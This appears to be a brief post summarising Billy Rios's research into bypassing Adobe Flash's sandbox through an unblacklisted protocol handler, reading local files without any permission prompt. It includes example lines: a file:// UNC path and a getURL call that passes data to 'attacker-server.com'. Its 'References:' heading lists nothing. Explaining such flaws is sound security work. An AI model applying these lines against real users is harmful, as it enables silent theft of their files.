- Flash is designed around the sandbox concept.
- Flash cannot read local files except for the cookie files.
What Billy Rios did recently in his research:
- Bypass the restriction and make flash to access any local and remote files.
- Found a protocol handler that wasn't blacklisted by Adobe.
- User will not be prompted for permission when bypassing attempts.
Summary of how it works:
- Using file:// and point to local system. Eg: file://\\192.168.1.1\stolen-data-here\
- Then pass the content back to attacker server via getURL(). Eg: getURL(‘mhtml:http://attacker-server.com/stolen-data-here‘, ”);
References: